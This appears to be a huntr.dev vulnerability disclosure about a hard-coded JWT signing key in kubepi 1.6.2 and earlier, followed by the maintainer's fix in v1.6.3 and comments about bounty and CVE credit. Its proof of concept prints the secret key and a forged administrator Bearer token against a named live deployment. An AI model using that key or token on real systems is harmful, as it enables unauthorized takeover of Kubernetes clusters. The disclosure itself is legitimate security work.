JwtSigKey hardcoded causes the k8s cluster to take over in kubeoperator/kubepi

Valid

Reported on

Jan 2nd 2023


Description

The jwt authentication function of kubepi <= v1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Further use the administrator to take over the k8s cluster of the target enterprise.

Proof of Concept

The hard-coded jwtSigKey value of kubepi is signature_hmac_secret_shared_key, so it only needs to sign the forged jwt token.

Taking kubepi deployed on zhgd-kubepi.xingshicloud.com as an example, an attacker can forge the following jwt tokens:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml 0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5 hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNjcyNjUxNzc2LCJleHAiOjE3ODM2NTIzNzZ9.i-83qNf6pGJkUYdZCk nHeTG6PsYKc1FRyjrRcPJUKvI

After the administrator account is successfully taken over, you can take over the k8s cluster PoC.png

Impact

An attacker can forge any jwt token to take over the administrator account of any online project. Further use the administrator to take over the k8s cluster of the target enterprise.

Occurrences

The use of hard-coded JwtSigKey allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.

We are processing your report and will contact the kubeoperator/kubepi team within 24 hours. a year ago
无在无不在 modified the report
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the kubeoperator/kubepi team and are waiting to hear back a year ago
无在无不在
a year ago

Researcher


I noticed that kubepi has officially released a bug repair notice, why is the status of the report still awaiting review ?

无在无不在
a year ago

Researcher


Am I eligible for the prize pot ? :)

kubeoperator/kubepi maintainer validated this vulnerability a year ago
shangrui-hash has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
kubeoperator/kubepi maintainer marked this as fixed in v1.6.3 with commit 3be58b a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
session.go#L35 has been validated
kubeoperator/kubepi maintainer
a year ago

Maintainer


The vulnerability has been fixed and CVE-2023-22463 has been issued, thanks for your report.

无在无不在
a year ago

Researcher


Hi huntr.dev team, I'm confused why the vulnerability was assigned CVE, but here it says: "This vulnerability will not receive a CVE"? Was it an operational error? Could you help me correct this error and assign CVE to my account? Thank you

Pavlos
a year ago

Admin


It's just that they have assigned a CVE from an external CNA... We will now assign it to your account though :)

to join this conversation